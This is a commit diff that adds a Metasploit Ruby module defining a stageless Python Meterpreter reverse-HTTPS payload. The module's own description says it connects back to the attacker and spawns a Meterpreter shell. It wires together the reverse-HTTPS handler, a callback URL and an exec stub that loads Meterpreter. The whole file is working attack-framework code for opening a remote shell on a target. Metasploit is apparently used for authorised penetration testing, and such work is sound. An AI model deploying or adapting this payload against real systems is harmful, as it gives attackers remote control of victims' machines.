Add stageless python meterpreter http & https payloads
This commit is contained in:
@@ -0,0 +1,48 @@
|
||||
##
|
||||
# This module requires Metasploit: http://metasploit.com/download
|
||||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
|
||||
require 'msf/core'
|
||||
require 'msf/core/handler/reverse_https'
|
||||
require 'msf/core/payload/python'
|
||||
require 'msf/core/payload/python/meterpreter_loader'
|
||||
require 'msf/core/payload/python/reverse_http'
|
||||
require 'msf/base/sessions/meterpreter_python'
|
||||
|
||||
module Metasploit4
|
||||
|
||||
CachedSize = 50190
|
||||
|
||||
include Msf::Payload::Single
|
||||
include Msf::Payload::Python
|
||||
include Msf::Payload::Python::ReverseHttp
|
||||
include Msf::Payload::Python::MeterpreterLoader
|
||||
|
||||
def initialize(info = {})
|
||||
super(merge_info(info,
|
||||
'Name' => 'Python Meterpreter Shell, Reverse HTTPS Inline',
|
||||
'Description' => 'Connect back to the attacker and spawn a Meterpreter shell',
|
||||
'Author' => 'Spencer McIntyre',
|
||||
'License' => MSF_LICENSE,
|
||||
'Platform' => 'python',
|
||||
'Arch' => ARCH_PYTHON,
|
||||
'Handler' => Msf::Handler::ReverseHttps,
|
||||
'Session' => Msf::Sessions::Meterpreter_Python_Python
|
||||
))
|
||||
end
|
||||
|
||||
def generate_reverse_http(opts={})
|
||||
opts[:scheme] = 'https'
|
||||
opts[:uri_uuid_mode] = :init_connect
|
||||
met = stage_meterpreter({
|
||||
http_url: generate_callback_url(opts),
|
||||
http_user_agent: opts[:user_agent],
|
||||
http_proxy_host: opts[:proxy_host],
|
||||
http_proxy_port: opts[:proxy_port]
|
||||
})
|
||||
|
||||
py_create_exec_stub(met)
|
||||
end
|
||||
|
||||
end
|
||||
Reference in New Issue
Block a user